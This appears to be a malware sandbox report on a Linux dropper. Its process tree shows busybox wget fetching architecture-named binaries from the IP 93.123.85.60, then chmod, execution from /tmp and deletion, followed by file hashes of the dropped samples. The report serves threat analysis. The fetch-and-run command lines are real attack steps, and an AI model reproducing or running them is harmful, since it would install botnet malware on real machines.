/bin/rmrm -rf m.-..-6-.-8k2⤵PID:1750
-
-
/bin/busyboxbusybox wget -O s-.-pa.-rc http://93.123.85.60/s-.-pa.-rc2⤵
- Writes file to tmp directory
PID:1751
-
-
/bin/chmodchmod +x s-.-pa.-rc2⤵
- File and Directory Permissions Modification
PID:1752
-
-
/tmp/s-.-pa.-rc./s-.-pa.-rc2⤵
- Executes dropped EXE
PID:1753
-
-
/bin/rmrm -rf s-.-pa.-rc2⤵PID:1755
-
-
/bin/busyboxbusybox wget -O a-.-r.-m.-4 http://93.123.85.60/a-.-r.-m.-42⤵
- Writes file to tmp directory
PID:1756
-
-
/bin/chmodchmod +x a-.-r.-m.-42⤵
- File and Directory Permissions Modification
PID:1757
-
-
/tmp/a-.-r.-m.-4./a-.-r.-m.-42⤵
- Executes dropped EXE
PID:1758
-
-
/bin/rmrm -rf a-.-r.-m.-42⤵PID:1760
-
-
/bin/busyboxbusybox wget -O a.-.--.r.--m-.--5 http://93.123.85.60/a.-.--.r.--m-.--52⤵
- Writes file to tmp directory
PID:1761
-
-
/bin/chmodchmod +x a.-.--.r.--m-.--52⤵
- File and Directory Permissions Modification
PID:1762
-
-
/tmp/a.-.--.r./a.-.--.r2⤵PID:1763
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
132KB
MD587074be3414c135350ff3d3a80bbbe5a
SHA1475a34a061d4f691ed92ce3922768e907c1bb0b0
SHA256ca364ea893a8309fff313e1558a72af69e5f18f504b24785abf83d524abe5d2f
SHA51288950226dd3c10dc56f3c1fac23ed7066cd734c569402a25b5b08a62797d2ecd9cfe7f12ee0db5e7eb3cc75bab6aa227d19651d70d666d374c418d6defaeb813
-
Filesize
172KB
MD5dfcb7b0e806a0469543742ccfa3d49cf
SHA1adce59a33be26a600906ceab364af45d16627806
SHA256febfb27dda2dd2ef5bff942591e4217988c7ff387a11b7490119eb230b4cdbe9
SHA51286bc249178ed959166d85b2313fadc2a4c4d6de1b29c3ff7f1e568fb77a8cf9825855a571988a923bfa6d4d57353a4decfd7602957065beda6c86cbfdca7684b
-
Filesize
172KB
MD5e346eb40056eb3c499f2437f8a85d278
SHA13c76ff0831acc148ab8443bffd659d4b3a80b8c0
SHA256ed6d520707ff72175f5e44b96e78de20e8db2786cd4c16d686b4fb2aad7c9399
SHA5122282c2697fda354deabcd5ebed428e969d50e814d7f8981343b76f9481daa5c3a2244e1f1731973d76c87953dbd7028776dcf32f96535c3997f60f4d50f04eea
-
Filesize
172KB
MD5775b6ccf9472e033fe84591aa0c21db2
SHA10d7c2769b792919327181eeb7feb6a656937c4fb
SHA256ac1bf270cdb899b3dcd0a908d88dfb43547af9b0a6e7449ae84682eb5b5bc8a8
SHA512c795cdc93d478f4212e1ac85d01b732da1fd8665f2f4dc65af0b97c07cc3dba94b3b492261a4c21c3051c7fd9bfc51a47ea587839e631404f77e56df7d7fd776
-
Filesize
104KB
MD54458a4194113d28ee91f9f3c3f208953
SHA10c361b2f3ce4d54a63a0196c784dc08f13bdfb67
SHA2569a2e74f26d7ac21d67da82abc9110f6d495b51dbf1fa955aa797a8be958be177
SHA512fa5a71da90f5b3fbbb865d1251b98884e7320d23afd078281af0736ba111914b1ca35c3dd027826bec2fc95f84938d28dba171f11a1563faf88f636509e8aa16
-
Filesize
103KB
MD5958f16f0e3c8147cfba3bb9e4ec3b6be
SHA1fbd056714dd714b5483a4d1f060acd0310b7c01b
SHA2564c6d9c9f565b84aff8c92e7defd56371af130c78751adf30cf951f2f6caefc04
SHA5122372e48ddb1a250416c26f0e943f9cf7ab20b2e781c92a6d81beeb29acd6caab51592cd2b268c6e95678c6e88b499eac141bf868709f3f3233b2144d83b38e25
-
Filesize
173KB
MD50f6aed653ea1b2ddf6c62e0d63b9942e
SHA18e3e0d4adf81c2504724f18cb54ebc50b8a5219e
SHA2561b2dcd476d1f2fb510c5ef30f49a680c538ed22a51e066bf81e0201f12d8a6ea
SHA5126c928b63a9d3ffd3863396bc11c30052e69ece6d1510f9b7ce9e496ca283a36f61d3b92423ef856ad12981021995ddef49e76aa42afe690fa83629fa8e64c1f1
-
Filesize
173KB
MD5e342e6e55fc96346dbf8048bc23be7a2
SHA183ecbffacd473393a322380adbc55760b2130bf8
SHA2561fb9578c41203a3be431f1873875141f0efed6099077f9fd0dc3544b4d21bd74
SHA5120d088cbec9fa94d424d33d10d9ec82ce8a1d37c2f9eabb0346adc979cb55a1c7b6901867665cbc2364a3cf55f0524c7c91f0b590c724d9e60dea5cf73fb1a2df
-
Filesize
126KB
MD52f44adafa80353c8f38cfb6ea4c9e9e1
SHA19d35afdb712159b72422dff2759fbb31cdcf3f99
SHA2566e09f440921f3e370237d543e4066059de6a5fcb009ed0f62ce0e7f02b0e083e
SHA512427f8d3111e7bcbbcf49b5adb9ba461e196a972c46f38d68424460561a15488f32e7a96a922ec758ef2ab0279409dc870efaa242412dc747204ddddccc058460
-
Filesize
125KB
MD5b51e28507453347746992f1012f7badb
SHA1eab6451ce15aa815a67c648bc9baa109d06d31c4
SHA256e3e24ba00bfdc85212de8555b7f7a2aad79b1a7f89dc24b9f1153ebc2805a3b6
SHA512cb84d46bbbb2f8bab4c543851f9b4cdc6e9abc6bdba999b49ae5e0479e10b77f1379d8f719aa43cf4d4d259c68f9e8823ddc2c5ab84cc6f1ac407b0924edd72b
-
Filesize
208B
MD5a7ca1278c23ad0afd81c74cd6fe42282
SHA162735e99907c66c544538f2c1b7d8b51a0f405ae
SHA256e3671fd945a1abbcfc3675aa47a5729d98e8cb452628dfa5bded3cfa378ed2dd
SHA5123403b6a21253ba88c3744b4736621d42302c94963e0a8c76a535fd710ed6c1453ff032286933aecb3841a7e18078ccb56ffb16ebafacf0046a631f14635ddc42
-
Filesize
143KB
MD5a12ff26787845727f01fff50500fcd76
SHA186a910cdf5683f4cbbbcc357c7fab6872775fc67
SHA2563dccf92e5113cf4cd1422943583406e5b6f7c2cf7207ebe6f4a60fbddc58e8ab
SHA5120739fc3a2a31e752e1836b4b95682ed72967a983cc986ead9427ca3c3a8dda525b6b0c0047190a89617626a2db80cc2f9ff6525ef976b5897927609c02bc43c2
-
Filesize
119KB
MD5c63009396462fb713ccbdc1917a1bcde
SHA140a39ce6fb7ef7f845d02b747e06cccc0627522d
SHA256386ecb26e8582f49fb4ee73cdf1201ba7e9aa24f327ccdf18c56eb3a40fa09c0
SHA512a62e29e238df261fdcabed974841a142ffb5ad7c3845cc6c7af0b8e2c828e31f3e059d401cca667c0784524b7a9e3e325be6af79693d0abd2da17f3b91e6a6b4
-
Filesize
124KB
MD5529714109cae9394a028d64b0f4575d1
SHA169cf98d8598b6dfaac2d45ef61251db49de80db2
SHA256e9d283427fe848cc83fbb538fdfcd06f4f92c2f566fc21cf1158ef0a36c56fa4
SHA5121b808c98534c1c29a5f71761ea1de2299d9fe1c32cf24838ee406354e2e7d68ca8ac1e8c480009c97c41ecff5028fbbdede85a80b21135d888f1d8474224cf6d